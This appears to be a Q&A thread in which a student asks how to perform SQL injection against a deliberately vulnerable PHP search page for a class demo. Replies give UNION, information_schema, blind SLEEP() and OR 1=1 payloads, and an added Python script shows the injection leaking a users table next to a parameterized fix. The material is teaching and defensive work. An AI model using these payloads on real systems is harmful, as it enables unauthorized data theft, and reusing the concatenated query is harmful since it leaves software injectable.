
I'm writing a demo webpage to show SQL injection techniques for a class project. I'm almost sure it's horribly coded in the right way, but I'm having trouble getting the actual injection to work. The code is supposed to take input from an HTML textbox and check a table called "stock" and output the results, if any. Here is the relevant section of the code:

    <?php
    // Connect to the database (legacy mysql_* extension, removed in PHP 7)
    $con = @mysql_connect('localhost', 'root', 'Secure') or die('Failed.');
    mysql_select_db('test', $con) or die('Could not select database.');
    ?>

    <!-- <div>Text box, takes user input for a search</div> -->
    <div class="center">
    <form action="index.php" method="post">
        <p>Search: <input type="text" name="lookup" placeholder="Whatchu tryna find?"></p>
        <br>
        <p class="button"><input type="submit" name="search" value="search" size="100"></p>
    </form>
    </div>
    <!-- <div>End of HTML code</div> -->

    <?php
    // Check if there is input, then put it in a variable called $search
    // (initialised so the query below does not hit an undefined variable on first load)
    $search = '';
    if (isset($_POST['lookup'])) {
        $search = $_POST['lookup'];
        if (empty($search)) {
            echo "Fill in all the fields";
            exit();
        }
    }

    // Query statement, held by $query.
    // $search is concatenated straight into the SQL string, which is the injection point.
    $query = mysql_query("SELECT * FROM `stock` WHERE `Name` LIKE '%$search%'");

    // Take results from $query, output them
    while ($list = mysql_fetch_assoc($query)) {
        echo 'Item: ' . $list['Name'] . '<br>';
        echo 'Price: $' . $list['Price'] . '<br>';
        echo 'Stock: ' . $list['Quantity'] . '<br>';
    }
    ?>

I can successfully search the 'stock' table, and I can output everything in the table by searching for % or by entering http://localhost/index.php?search=hammer%20OR%201=1 into the browser. But that's all I can do so far.

Is there anything I can change in this code to make SQLi easier? Or is something wrong with my SQLi technique? It doesn't matter where the injection happens, from the textbox or the address bar, as long as I can show multiple techniques. I can dump the table from the address bar, but I'd like to show the sleep() function getting used as well as navigate to and dump info from other tables, even other databases within my server. But I'm having trouble figuring out how to do that.

Finally, are there any kiddie scripts or programs anyone knows of for SQLi I can run against my localhost site? I still need to demonstrate manual techniques but I thought it might be good to show the class how fast a proper tool can attack a vulnerable site. Obviously I will only use this on my project because I don't want to go to jail.

Edit: The post How can I prevent SQL injection in PHP? was linked, and it seems quite detailed but not quite what I'm looking for since I need to know how to break the website, not fix it. The issue does indeed seem to be with my SQLi technique.

Eric R
  • [sqlmap](https://github.com/sqlmapproject/sqlmap) is a good tool for SQL injection – Blag Apr 23 '17 at 20:16
  • Possible duplicate of [How can I prevent SQL injection in PHP?](http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – Qirel Apr 23 '17 at 20:25
  • If you do `whatever' OR 1=1--` in your form, it'd bypass the `LIKE` altogether. That's SQL injection. – Qirel Apr 23 '17 at 20:27

2 Answers


The most common techniques for MySQL injection are:

  1. Abuse UNION to turn a query on one table into a query on any table or value, e.g.

    SELECT * FROM `stock` WHERE `Name` LIKE '' AND 0 UNION SELECT 
        DATABASE(), VERSION(), USER()
    -- '

    The injected content is the portion from `' AND 0 UNION SELECT` through the closing `-- ` comment.

  2. Use the information_schema database to fetch metadata, like the names of tables and columns, e.g.

    SELECT TABLE_NAME FROM information_schema.tables
        WHERE TABLE_SCHEMA = 'my_database'

    SELECT COLUMN_NAME FROM information_schema.columns
        WHERE TABLE_SCHEMA = 'my_database' AND TABLE_NAME = 'a_table'

  3. If your injection does not display any results, use the SLEEP() function to make true/false queries, like:

    SELECT SLEEP(2) FROM some_table WHERE id = 1 AND value LIKE 'a%' LIMIT 1

    This will sleep for two seconds if the column with ID 1 has a value which starts with "a", or return immediately otherwise. You can use a series of these queries to slowly guess the contents of a row. (For example: Does it start with "a"? NO. Does it start with "b"? YES. Does it start with "ba"?… etc.)

    This technique is known as blind SQL injection.
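The query shape from the question and the UNION technique from this answer, recreated as an added example (not code from the question, the answer, or any project) in Python over an in-memory SQLite database so it runs offline. The `stock` and `users` tables and their rows are constructed for the example; SQLite stands in for MySQL, so the answer's `DATABASE(), VERSION(), USER()` columns are replaced by three columns of the second table. `search_vulnerable` reproduces the PHP string concatenation; `search_safe` is the fix a defender would ship: a bound parameter, plus escaping of `%` and `_`, because a parameter stops injection but not wildcard abuse (the "search for `%` dumps the whole table" behaviour the asker observed).

```python
import sqlite3

# Constructed sample schema and rows: a stand-in for the asker's MySQL `stock`
# table plus a second table that an attacker would want to reach via UNION.
SCHEMA = """
CREATE TABLE stock (Name TEXT, Price REAL, Quantity INTEGER);
INSERT INTO stock VALUES ('hammer', 9.99, 12), ('nails', 2.49, 500), ('saw', 19.95, 3);
CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT);
INSERT INTO users VALUES ('admin', 'hash-placeholder-1', 'admin'),
                         ('bob',   'hash-placeholder-2', 'user');
"""

# Payloads taken from the page: the UNION form from the answer (with the
# MySQL-only functions swapped for columns of `users`) and the OR form from
# the comments under the question.
UNION_PAYLOAD = "' AND 0 UNION SELECT username, password_hash, role FROM users -- "
OR_PAYLOAD = "' OR 1=1-- "


def new_db():
    """Fresh in-memory database with the constructed tables."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con, search):
    """Mirrors the PHP line  ... WHERE `Name` LIKE '%$search%'  : the user's
    text is spliced into the SQL, so quotes and keywords in it are parsed as SQL."""
    sql = "SELECT * FROM stock WHERE Name LIKE '%" + search + "%'"
    return con.execute(sql).fetchall()


def escape_like(text, esc="\\"):
    """Neutralise LIKE wildcards. A bound parameter keeps the text out of the SQL
    grammar, but '%' and '_' are still wildcards *inside* the pattern value."""
    return (text.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_safe(con, search):
    """Hardened form: the pattern travels as a bound parameter and wildcards in
    the user's text are escaped, so the input can only ever be matched literally."""
    sql = "SELECT * FROM stock WHERE Name LIKE ? ESCAPE '\\'"
    return con.execute(sql, ("%" + escape_like(search) + "%",)).fetchall()


def compare(search):
    """Run the same input through both versions; returns (vulnerable_rows, safe_rows)."""
    return search_vulnerable(new_db(), search), search_safe(new_db(), search)


if __name__ == "__main__":
    for label, payload in [("plain", "hammer"), ("wildcard", "%"),
                           ("or", OR_PAYLOAD), ("union", UNION_PAYLOAD)]:
        vuln, safe = compare(payload)
        print(f"{label:9s} vulnerable={len(vuln)} rows  safe={len(safe)} rows")
        if label == "union":
            # The vulnerable query now returns rows from `users`, not `stock`.
            print("          leaked:", [r[0] for r in vuln])
```

Running the script shows the vulnerable search returning all three stock rows for `%` and for the OR payload, and returning the two `users` rows for the UNION payload, while the hardened search returns one row for `hammer` and nothing for the three payloads. The `ESCAPE` clause is the part most fixes forget: without it, the parameterized query would still return every row for a bare `%`.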


Try this in search field : '; some query here; #

Jameel